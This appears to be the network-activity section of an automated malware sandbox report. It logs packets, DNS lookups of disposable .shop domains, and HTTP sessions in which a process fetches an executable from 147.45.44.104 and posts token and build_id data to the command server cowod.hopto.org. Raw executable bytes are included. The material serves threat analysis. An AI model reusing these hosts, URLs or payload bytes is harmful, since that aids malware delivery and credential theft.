Sep 21, 2024 18:52:14.193784952 CEST	49771	443	192.168.2.4	45.132.206.251
Sep 21, 2024 18:52:14.194178104 CEST	49771	443	192.168.2.4	45.132.206.251
Sep 21, 2024 18:52:14.235434055 CEST	443	49771	45.132.206.251	192.168.2.4
Sep 21, 2024 18:52:14.454447031 CEST	443	49772	172.67.203.61	192.168.2.4
Sep 21, 2024 18:52:14.454668999 CEST	443	49772	172.67.203.61	192.168.2.4
Sep 21, 2024 18:52:14.454757929 CEST	49772	443	192.168.2.4	172.67.203.61
Sep 21, 2024 18:52:14.454919100 CEST	49772	443	192.168.2.4	172.67.203.61
Sep 21, 2024 18:52:14.454972982 CEST	443	49772	172.67.203.61	192.168.2.4
Sep 21, 2024 18:52:14.455005884 CEST	49772	443	192.168.2.4	172.67.203.61
Sep 21, 2024 18:52:14.455024004 CEST	443	49772	172.67.203.61	192.168.2.4
Sep 21, 2024 18:52:14.458590031 CEST	49773	443	192.168.2.4	104.21.9.6
Sep 21, 2024 18:52:14.458626032 CEST	443	49773	104.21.9.6	192.168.2.4
Sep 21, 2024 18:52:14.458703995 CEST	49773	443	192.168.2.4	104.21.9.6
Sep 21, 2024 18:52:14.458933115 CEST	49773	443	192.168.2.4	104.21.9.6
Sep 21, 2024 18:52:14.458940983 CEST	443	49773	104.21.9.6	192.168.2.4
Sep 21, 2024 18:52:14.571830988 CEST	443	49771	45.132.206.251	192.168.2.4
Sep 21, 2024 18:52:14.571991920 CEST	49771	443	192.168.2.4	45.132.206.251
Sep 21, 2024 18:52:14.572020054 CEST	443	49771	45.132.206.251	192.168.2.4
Sep 21, 2024 18:52:14.572067022 CEST	49771	443	192.168.2.4	45.132.206.251
Sep 21, 2024 18:52:14.572069883 CEST	443	49771	45.132.206.251	192.168.2.4
Sep 21, 2024 18:52:14.572114944 CEST	49771	443	192.168.2.4	45.132.206.251
Sep 21, 2024 18:52:14.572141886 CEST	49771	443	192.168.2.4	45.132.206.251
Sep 21, 2024 18:52:14.572159052 CEST	443	49771	45.132.206.251	192.168.2.4
Sep 21, 2024 18:52:14.572170019 CEST	49771	443	192.168.2.4	45.132.206.251
Sep 21, 2024 18:52:14.572196007 CEST	49771	443	192.168.2.4	45.132.206.251
Sep 21, 2024 18:52:14.943651915 CEST	443	49773	104.21.9.6	192.168.2.4
Sep 21, 2024 18:52:14.943722010 CEST	49773	443	192.168.2.4	104.21.9.6
Sep 21, 2024 18:52:14.945014954 CEST	49773	443	192.168.2.4	104.21.9.6
Sep 21, 2024 18:52:14.945023060 CEST	443	49773	104.21.9.6	192.168.2.4
Sep 21, 2024 18:52:14.945409060 CEST	443	49773	104.21.9.6	192.168.2.4
Sep 21, 2024 18:52:14.946659088 CEST	49773	443	192.168.2.4	104.21.9.6
Sep 21, 2024 18:52:14.946696997 CEST	49773	443	192.168.2.4	104.21.9.6
Sep 21, 2024 18:52:14.946742058 CEST	443	49773	104.21.9.6	192.168.2.4
Sep 21, 2024 18:52:15.362891912 CEST	443	49773	104.21.9.6	192.168.2.4
Sep 21, 2024 18:52:15.363131046 CEST	443	49773	104.21.9.6	192.168.2.4
Sep 21, 2024 18:52:15.363215923 CEST	49773	443	192.168.2.4	104.21.9.6
Sep 21, 2024 18:52:15.363415956 CEST	49773	443	192.168.2.4	104.21.9.6
Sep 21, 2024 18:52:15.363431931 CEST	443	49773	104.21.9.6	192.168.2.4
Sep 21, 2024 18:52:15.363452911 CEST	49773	443	192.168.2.4	104.21.9.6
Sep 21, 2024 18:52:15.363459110 CEST	443	49773	104.21.9.6	192.168.2.4
Sep 21, 2024 18:52:15.381385088 CEST	49774	443	192.168.2.4	104.21.16.38
Sep 21, 2024 18:52:15.381427050 CEST	443	49774	104.21.16.38	192.168.2.4
Sep 21, 2024 18:52:15.381535053 CEST	49774	443	192.168.2.4	104.21.16.38
Sep 21, 2024 18:52:15.381825924 CEST	49774	443	192.168.2.4	104.21.16.38
Sep 21, 2024 18:52:15.381838083 CEST	443	49774	104.21.16.38	192.168.2.4
Sep 21, 2024 18:52:15.871834993 CEST	443	49774	104.21.16.38	192.168.2.4
Sep 21, 2024 18:52:15.871917009 CEST	49774	443	192.168.2.4	104.21.16.38
Sep 21, 2024 18:52:15.882229090 CEST	49774	443	192.168.2.4	104.21.16.38
Sep 21, 2024 18:52:15.882247925 CEST	443	49774	104.21.16.38	192.168.2.4
Sep 21, 2024 18:52:15.882656097 CEST	443	49774	104.21.16.38	192.168.2.4
Sep 21, 2024 18:52:15.885988951 CEST	49774	443	192.168.2.4	104.21.16.38
Sep 21, 2024 18:52:15.886008978 CEST	49774	443	192.168.2.4	104.21.16.38
Sep 21, 2024 18:52:15.886149883 CEST	443	49774	104.21.16.38	192.168.2.4
Sep 21, 2024 18:52:15.990484953 CEST	443	49774	104.21.16.38	192.168.2.4
Sep 21, 2024 18:52:15.990614891 CEST	443	49774	104.21.16.38	192.168.2.4
Sep 21, 2024 18:52:15.990683079 CEST	49774	443	192.168.2.4	104.21.16.38
Sep 21, 2024 18:52:15.990698099 CEST	443	49774	104.21.16.38	192.168.2.4
Sep 21, 2024 18:52:15.990772963 CEST	443	49774	104.21.16.38	192.168.2.4
Sep 21, 2024 18:52:15.990961075 CEST	443	49774	104.21.16.38	192.168.2.4
Sep 21, 2024 18:52:15.991008043 CEST	49774	443	192.168.2.4	104.21.16.38
Sep 21, 2024 18:52:15.991839886 CEST	49774	443	192.168.2.4	104.21.16.38
Sep 21, 2024 18:52:15.991857052 CEST	443	49774	104.21.16.38	192.168.2.4
Sep 21, 2024 18:52:15.991872072 CEST	49774	443	192.168.2.4	104.21.16.38
Sep 21, 2024 18:52:15.991878033 CEST	443	49774	104.21.16.38	192.168.2.4
Sep 21, 2024 18:52:16.071563959 CEST	49775	443	192.168.2.4	104.21.16.38
Sep 21, 2024 18:52:16.071635008 CEST	443	49775	104.21.16.38	192.168.2.4
Sep 21, 2024 18:52:16.071738958 CEST	49775	443	192.168.2.4	104.21.16.38
Sep 21, 2024 18:52:16.072052002 CEST	49775	443	192.168.2.4	104.21.16.38
Sep 21, 2024 18:52:16.072072983 CEST	443	49775	104.21.16.38	192.168.2.4
Sep 21, 2024 18:52:16.763360023 CEST	443	49775	104.21.16.38	192.168.2.4
Sep 21, 2024 18:52:16.763447046 CEST	49775	443	192.168.2.4	104.21.16.38
Sep 21, 2024 18:52:16.764806032 CEST	49775	443	192.168.2.4	104.21.16.38
Sep 21, 2024 18:52:16.764820099 CEST	443	49775	104.21.16.38	192.168.2.4
Sep 21, 2024 18:52:16.765325069 CEST	443	49775	104.21.16.38	192.168.2.4
Sep 21, 2024 18:52:16.766577005 CEST	49775	443	192.168.2.4	104.21.16.38
Sep 21, 2024 18:52:16.766618967 CEST	49775	443	192.168.2.4	104.21.16.38
Sep 21, 2024 18:52:16.766674042 CEST	443	49775	104.21.16.38	192.168.2.4
Sep 21, 2024 18:52:17.165971041 CEST	443	49775	104.21.16.38	192.168.2.4
Sep 21, 2024 18:52:17.166218042 CEST	443	49775	104.21.16.38	192.168.2.4
Sep 21, 2024 18:52:17.166295052 CEST	49775	443	192.168.2.4	104.21.16.38
Sep 21, 2024 18:52:17.166477919 CEST	49775	443	192.168.2.4	104.21.16.38
Sep 21, 2024 18:52:17.166526079 CEST	443	49775	104.21.16.38	192.168.2.4
Sep 21, 2024 18:52:17.166555882 CEST	49775	443	192.168.2.4	104.21.16.38
Sep 21, 2024 18:52:17.166573048 CEST	443	49775	104.21.16.38	192.168.2.4
Sep 21, 2024 18:52:18.737174034 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 21, 2024 18:52:18.737426996 CEST	49770	80	192.168.2.4	45.132.206.251

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Sep 21, 2024 18:51:26.437197924 CEST	61714	53	192.168.2.4	1.1.1.1
Sep 21, 2024 18:51:26.516501904 CEST	53	61714	1.1.1.1	192.168.2.4
Sep 21, 2024 18:52:09.806900024 CEST	53670	53	192.168.2.4	1.1.1.1
Sep 21, 2024 18:52:10.385427952 CEST	53	53670	1.1.1.1	192.168.2.4
Sep 21, 2024 18:52:11.343712091 CEST	49617	53	192.168.2.4	1.1.1.1
Sep 21, 2024 18:52:11.357880116 CEST	53	49617	1.1.1.1	192.168.2.4
Sep 21, 2024 18:52:12.405699015 CEST	55185	53	192.168.2.4	1.1.1.1
Sep 21, 2024 18:52:12.419568062 CEST	53	55185	1.1.1.1	192.168.2.4
Sep 21, 2024 18:52:12.700445890 CEST	63271	53	192.168.2.4	1.1.1.1
Sep 21, 2024 18:52:12.709764957 CEST	53	63271	1.1.1.1	192.168.2.4
Sep 21, 2024 18:52:13.447797060 CEST	59126	53	192.168.2.4	1.1.1.1
Sep 21, 2024 18:52:13.464624882 CEST	53	59126	1.1.1.1	192.168.2.4
Sep 21, 2024 18:52:15.364794016 CEST	58812	53	192.168.2.4	1.1.1.1
Sep 21, 2024 18:52:15.380728960 CEST	53	58812	1.1.1.1	192.168.2.4

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Sep 21, 2024 18:51:26.437197924 CEST	192.168.2.4	1.1.1.1	0xf67c	Standard query (0)	steamcommunity.com	A (IP address)	IN (0x0001)	false
Sep 21, 2024 18:52:09.806900024 CEST	192.168.2.4	1.1.1.1	0x15c1	Standard query (0)	appleboltelwk.shop	A (IP address)	IN (0x0001)	false
Sep 21, 2024 18:52:11.343712091 CEST	192.168.2.4	1.1.1.1	0xa8f	Standard query (0)	surveriysiop.shop	A (IP address)	IN (0x0001)	false
Sep 21, 2024 18:52:12.405699015 CEST	192.168.2.4	1.1.1.1	0xee5f	Standard query (0)	captainynfanw.shop	A (IP address)	IN (0x0001)	false
Sep 21, 2024 18:52:12.700445890 CEST	192.168.2.4	1.1.1.1	0x31a6	Standard query (0)	cowod.hopto.org	A (IP address)	IN (0x0001)	false
Sep 21, 2024 18:52:13.447797060 CEST	192.168.2.4	1.1.1.1	0xef8a	Standard query (0)	tearrybyiwo.shop	A (IP address)	IN (0x0001)	false
Sep 21, 2024 18:52:15.364794016 CEST	192.168.2.4	1.1.1.1	0x2ac3	Standard query (0)	tendencerangej.shop	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	Address	Type	Class	DNS over HTTPS
Sep 21, 2024 18:51:26.516501904 CEST	1.1.1.1	192.168.2.4	0xf67c	No error (0)	steamcommunity.com	92.122.104.90	A (IP address)	IN (0x0001)	false
Sep 21, 2024 18:52:10.385427952 CEST	1.1.1.1	192.168.2.4	0x15c1	No error (0)	appleboltelwk.shop	104.21.9.6	A (IP address)	IN (0x0001)	false
Sep 21, 2024 18:52:10.385427952 CEST	1.1.1.1	192.168.2.4	0x15c1	No error (0)	appleboltelwk.shop	172.67.140.206	A (IP address)	IN (0x0001)	false
Sep 21, 2024 18:52:11.357880116 CEST	1.1.1.1	192.168.2.4	0xa8f	No error (0)	surveriysiop.shop	188.114.96.3	A (IP address)	IN (0x0001)	false
Sep 21, 2024 18:52:11.357880116 CEST	1.1.1.1	192.168.2.4	0xa8f	No error (0)	surveriysiop.shop	188.114.97.3	A (IP address)	IN (0x0001)	false
Sep 21, 2024 18:52:12.419568062 CEST	1.1.1.1	192.168.2.4	0xee5f	No error (0)	captainynfanw.shop	188.114.96.3	A (IP address)	IN (0x0001)	false
Sep 21, 2024 18:52:12.419568062 CEST	1.1.1.1	192.168.2.4	0xee5f	No error (0)	captainynfanw.shop	188.114.97.3	A (IP address)	IN (0x0001)	false
Sep 21, 2024 18:52:12.709764957 CEST	1.1.1.1	192.168.2.4	0x31a6	No error (0)	cowod.hopto.org	45.132.206.251	A (IP address)	IN (0x0001)	false
Sep 21, 2024 18:52:13.464624882 CEST	1.1.1.1	192.168.2.4	0xef8a	No error (0)	tearrybyiwo.shop	172.67.203.61	A (IP address)	IN (0x0001)	false
Sep 21, 2024 18:52:13.464624882 CEST	1.1.1.1	192.168.2.4	0xef8a	No error (0)	tearrybyiwo.shop	104.21.44.191	A (IP address)	IN (0x0001)	false
Sep 21, 2024 18:52:15.380728960 CEST	1.1.1.1	192.168.2.4	0x2ac3	No error (0)	tendencerangej.shop	104.21.16.38	A (IP address)	IN (0x0001)	false
Sep 21, 2024 18:52:15.380728960 CEST	1.1.1.1	192.168.2.4	0x2ac3	No error (0)	tendencerangej.shop	172.67.166.21	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

steamcommunity.com

116.203.165.127

appleboltelwk.shop

surveriysiop.shop

captainynfanw.shop

tearrybyiwo.shop

cowod.hopto.org

tendencerangej.shop

147.45.44.104

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49764	147.45.44.104	80	7520	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
Sep 21, 2024 18:52:06.842127085 CEST	190	OUT	GET /prog/66eef0ca0fb35_lfdsa.exe HTTP/1.1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0 Host: 147.45.44.104 Cache-Control: no-cache
Sep 21, 2024 18:52:07.460275888 CEST	1236	IN	HTTP/1.1 200 OK Server: nginx Date: Sat, 21 Sep 2024 16:52:07 GMT Content-Type: application/octet-stream Content-Length: 390560 Last-Modified: Sat, 21 Sep 2024 16:14:02 GMT Connection: keep-alive Keep-Alive: timeout=120 ETag: "66eef0ca-5f5a0" X-Content-Type-Options: nosniff Accept-Ranges: bytes Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 a6 d0 ee 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0b 00 00 9c 05 00 00 08 00 00 00 00 00 00 5e bb 05 00 00 20 00 00 00 c0 05 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 00 06 00 00 02 00 00 00 00 00 00 03 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 08 bb 05 00 53 00 00 00 00 c0 05 00 e0 05 00 00 00 00 00 00 00 00 00 00 78 cf 05 00 28 26 00 00 00 e0 05 00 0c 00 00 00 d0 b9 05 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELf^ @ `Sx(& H.textd `.rsrc@@.reloc@B@H^NmTlCzO3&1VH_&`{5("UNir[Hc{9i30\:d"D}ZJ3HfTWvi5mhWz!"t'Ll,);V96eFa/Tx5d,Ur98~av\N6a$qc-TM^)L"Vq>Epo>yR!4 Ps".j1]HLlMDT
Sep 21, 2024 18:52:07.460341930 CEST	1236	IN	Data Raw: 32 01 54 0c b5 b3 ec db 2f fb 8d 6b 26 5d 8c 3d 53 df 15 46 71 e7 6d c4 fc 60 9f e9 4e d0 20 c0 2b 6e 43 c2 49 e4 bc 55 b1 2f 3b 56 83 d3 c2 49 9b 18 2a 4b c5 4f a1 70 47 20 a4 6b 13 0c 3a e5 37 23 c4 8d f0 c9 28 f3 88 b8 49 b5 75 2a 7b f6 0e 84 Data Ascii: 2T/k&]=SFqm`N +nCIU/;VIKOpG k:7#(Iu{_'ICQ of~a?5`idd"\|)?&2{!>d:iT}L 94;?IaM54~5C]3<<!!m_*6vV}\|wmI_]5hTh;G3
Sep 21, 2024 18:52:07.460381031 CEST	1236	IN	Data Raw: 24 b3 61 f3 bd f1 f1 03 3c f5 c9 09 7b ce 66 98 ca 05 ba 69 a0 37 c7 8f 27 ce 9a 2f 86 6f 7e 8e 54 61 05 36 f3 81 1f 0e d9 85 8f b7 c2 8f 35 a9 fe e8 86 3b 3a ed f5 fd 6d b9 81 68 9e 72 2c 28 f6 df 17 c5 de 21 b2 d6 d3 32 54 fd 13 86 ac 8e 5e 8d Data Ascii: $a<{fi7'/o~Ta65;:mhr,(!2T^ss^em0P%tqLCAgJRvA{8Ru#nRgN@GgVgWYPvn^jP*,A+(jI^pu
Sep 21, 2024 18:52:07.460437059 CEST	1236	IN	Data Raw: 2f 1d bb 94 b2 01 89 6e cf 9d 62 71 fb b8 87 84 ee 84 8f 4d b4 07 c7 f0 7c 66 fa 52 9d b0 b2 c6 87 2d 08 71 f7 cf 6c 34 57 4d 2e bb 59 98 54 62 6c e3 96 1b 80 0a 25 ad 78 74 f9 63 d5 7e e4 ab 13 0a 62 1b 08 2e f8 8e e6 13 a9 de 0b f7 d6 40 5c 3a Data Ascii: /nbqM\|fR-ql4WM.YTbl%xtc~b.@\:j\|o`xq)2iPn%e\JHlLtA\okXR`@;4fqi+cq'go\)OS&xP;K?6fFsS7#8
Sep 21, 2024 18:52:07.460470915 CEST	696	IN	Data Raw: e9 fc aa 70 d3 31 8a 9a b8 5c 76 c7 57 1f 1f 84 70 22 9a 6b c6 9c f3 a3 40 b3 ec b8 2d 5c 7a 8f a9 69 91 df 25 a7 41 c1 86 75 c0 b0 c6 9d 96 93 f2 2e 46 9d ee fa 65 9d 1d 9e 94 ab 75 6a ae 91 06 1d 50 92 e0 d6 dc 63 96 7e bb b1 fd ab 10 ac 5f da Data Ascii: p1\vWp"k@-\zi%Au.FeujPc~_TA,_\|aI%*A{8q"!~cP:xR! MX4MV[9l}s&aOMWEWfne"F`h<)eNgi]Po{h9@
Sep 21, 2024 18:52:07.460506916 CEST	1236	IN	Data Raw: 01 ce d1 39 70 0d f3 b4 07 98 5a 97 6e bd 46 53 4e 23 d2 0d 35 3b 44 0b b3 84 7c a2 ef 33 ef 99 e0 bf 3a b8 ce ee a0 ac bb 8e 48 94 05 75 ed a5 14 fb a7 d8 a0 5b 57 32 56 25 92 05 11 ca 2e 6c f3 43 cc 89 27 f1 67 1c 5a 01 5c 27 a0 1e 73 41 92 a3 Data Ascii: 9pZnFSN#5;D\|3:Hu[W2V%.lC'gZ\'sAfPD7=b1G(~, Zq*E0;_ZXN_~%/tY&k+L(=PonBCD;5rFx n5s4vFJN_8/AzG%j<
Sep 21, 2024 18:52:07.460599899 CEST	1236	IN	Data Raw: d7 05 92 dd b5 27 66 2c de 32 ac 92 49 b9 cc 90 0e d2 a1 2c 35 cf d9 7c f7 82 15 d4 d8 b4 97 b0 91 a0 f6 76 13 8b 53 4f 20 59 9e 79 6d db a5 05 5d 42 3b 68 c8 13 d2 9b e1 f1 c6 ac 98 b0 fe b5 99 93 04 8b 03 52 75 ff fc f8 6b 09 47 bb cf 3b 0a e6 Data Ascii: 'f,2I,5\|vSO Yym]B;hRukG;@;-Y1.Olv+q=*u.Q</,e)w]]gX^oL~RaOF7eDYA(%JBEf}ulaadrPP1#
Sep 21, 2024 18:52:07.460635900 CEST	1236	IN	Data Raw: e2 03 52 78 cc 42 b4 0b 1f 19 e4 c7 de 0f 79 a0 dd 9f 09 e6 20 b3 87 19 d3 09 7d d8 bf f8 fd 75 8e b0 61 7a 2d 75 20 6d 08 bc 71 6a 81 e3 01 35 90 3d b2 1a 9d 54 cb 3e 27 32 1c c9 50 5a 74 58 b9 af 1f fc 35 01 b9 c6 99 1b 7f 1b 6b 11 24 f9 04 30 Data Ascii: RxBy }uaz-u mqj5=T>'2PZtX5k$0=}TP~.R]?[HFi!Gk3_XimIZ(Z_^'eR?khJV%d`m1f=GN"TD3/WNCe'aq.
Sep 21, 2024 18:52:07.460670948 CEST	1236	IN	Data Raw: 57 22 5c e8 1e a9 5d 59 b2 b9 a9 58 61 56 d4 f0 a3 99 5c 3d 9a 82 e3 48 99 4e dc 4d 4b 39 05 6e 6d 25 df 99 1a a2 b5 78 81 38 b1 9b d0 79 1a 8c ed 07 ab 78 13 8e 03 6f 1e 0c 57 82 a6 03 36 6e ee 59 f6 c7 03 44 25 48 b8 f1 cc 79 13 29 5d 05 48 97 Data Ascii: W"\]YXaV\=HNMK9nm%x8yxoW6nYD%Hy)]H sEhNlD8~"%z>/+FEC84i@3p +kq;o5Hi(<)]rlsfGoB9dZA(6VD`F3L
Sep 21, 2024 18:52:07.460748911 CEST	1236	IN	Data Raw: 76 40 39 b9 de 31 7d f9 87 48 67 8b 30 44 9e e3 d2 55 49 0f 0f f3 69 28 b2 53 03 a5 a2 af 90 9a d1 ee 43 4c 36 ba b9 ca 42 ff 8e 3c 1f 7d 61 d0 0a d5 d1 2d 13 2d 32 fe ca e8 08 ff 83 cf e6 f7 9e cb 97 bb 89 ec 58 7a 6b 90 0a 03 e9 75 1a a2 5a 6d Data Ascii: v@91}Hg0DUIi(SCL6B<}a--2XzkuZm\|5DS6lmps%SExMN2N7G098T2]+sBwR*en/e9FQo}5;l8qr@$7gcd.TCJrl4Me
Sep 21, 2024 18:52:07.465624094 CEST	1236	IN	Data Raw: 9e fc 7c 7c 23 77 1a 12 53 c0 94 4f 6d 3a 31 e4 65 d4 2d 8d 84 fa dc 66 89 b7 2b 4b a8 83 a9 ea ef f3 df e9 5d ac 6a 4c 88 e5 31 0b 57 51 9b 9e fa b5 1d d5 33 58 74 8b c5 e0 d3 f3 1c 57 b9 aa 62 cf 67 10 3e a5 b2 11 ac 21 1c 91 14 89 ca 8f 1b a9 Data Ascii: \|\|#wSOm:1e-f+K]jL1WQ3XtWbg>!yzcu=&Nh#^<xYmywt}F{W0_z?Z:WH3+if"{MdRek*b.Vq5ulZ9GfDCUxBDA{E]I.e

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.4	49770	45.132.206.251	80	7520	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
Sep 21, 2024 18:52:12.716507912 CEST	281	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----BFBAAFHDHCBGCAKFHDAK User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0 Host: cowod.hopto.org Content-Length: 5785 Connection: Keep-Alive Cache-Control: no-cache
Sep 21, 2024 18:52:12.716545105 CEST	5785	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 42 46 42 41 41 46 48 44 48 43 42 47 43 41 4b 46 48 44 41 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 65 39 35 63 39 65 Data Ascii: ------BFBAAFHDHCBGCAKFHDAKContent-Disposition: form-data; name="token"e95c9ed0c509803496bb8eb56f9969f7------BFBAAFHDHCBGCAKFHDAKContent-Disposition: form-data; name="build_id"58cd250b15e666e5f72fcf5caa6cb131------BFBAAFHDHCBGCA
Sep 21, 2024 18:52:13.445173025 CEST	362	IN	HTTP/1.1 301 Moved Permanently Server: openresty Date: Sat, 21 Sep 2024 16:52:13 GMT Content-Type: text/html Content-Length: 166 Connection: keep-alive Location: https://cowod.hopto.org/ Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>openresty</center></body></html>

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49739	92.122.104.90	443	7520	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-21 16:51:27 UTC	119	OUT	GET /profiles/76561199780418869 HTTP/1.1 Host: steamcommunity.com Connection: Keep-Alive Cache-Control: no-cache
2024-09-21 16:51:28 UTC	1870	IN	HTTP/1.1 200 OK Server: nginx Content-Type: text/html; charset=UTF-8 Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.akamai.steamstatic.com/ https://cdn.akamai.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.akamai.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://.valvesoftware.com https://.steambeta.net https://.discovery.beta.steamserver.net https://.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq. [TRUNCATED] Expires: Mon, 26 Jul 1997 05:00:00 GMT Cache-Control: no-cache Date: Sat, 21 Sep 2024 16:51:27 GMT Content-Length: 34740 Connection: close Set-Cookie: sessionid=8c5a9f4f7a27bba77969cf87; Path=/; Secure; SameSite=None Set-Cookie: steamCountry=US%7Cd7fb65801182a5f50a3169fe2a0b7ef0; Path=/; Secure; HttpOnly; SameSite=None
2024-09-21 16:51:28 UTC	14514	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 20 72 65 73 70 6f 6e 73 69 76 65 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0d 0a 09 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 68 65 6d 65 2d 63 6f 6c 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 23 31 37 31 61 32 31 22 3e 0d 0a 09 09 3c Data Ascii: <!DOCTYPE html><html class=" responsive" lang="en"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta name="viewport" content="width=device-width,initial-scale=1"><meta name="theme-color" content="#171a21"><
2024-09-21 16:51:28 UTC	10062	IN	Data Raw: 64 65 73 74 72 6f 79 57 68 65 6e 44 6f 6e 65 27 3a 20 66 61 6c 73 65 2c 20 27 74 6f 6f 6c 74 69 70 43 6c 61 73 73 27 3a 20 27 73 75 70 65 72 6e 61 76 5f 63 6f 6e 74 65 6e 74 27 2c 20 27 6f 66 66 73 65 74 59 27 3a 2d 36 2c 20 27 6f 66 66 73 65 74 58 27 3a 20 31 2c 20 27 68 6f 72 69 7a 6f 6e 74 61 6c 53 6e 61 70 27 3a 20 34 2c 20 27 74 6f 6f 6c 74 69 70 50 61 72 65 6e 74 27 3a 20 27 23 67 6c 6f 62 61 6c 5f 68 65 61 64 65 72 20 2e 73 75 70 65 72 6e 61 76 5f 63 6f 6e 74 61 69 6e 65 72 27 2c 20 27 63 6f 72 72 65 63 74 46 6f 72 53 63 72 65 65 6e 53 69 7a 65 27 3a 20 66 61 6c 73 65 7d 29 3b 0d 0a 09 09 7d 29 3b 0d 0a 09 3c 2f 73 63 72 69 70 74 3e 0d 0a 0d 0a 09 09 3c 64 69 76 20 69 64 3d 22 67 6c 6f 62 61 6c 5f 61 63 74 69 6f 6e 73 22 3e 0d 0a 09 09 09 3c 64 69 Data Ascii: destroyWhenDone': false, 'tooltipClass': 'supernav_content', 'offsetY':-6, 'offsetX': 1, 'horizontalSnap': 4, 'tooltipParent': '#global_header .supernav_container', 'correctForScreenSize': false});});</script><div id="global_actions"><di
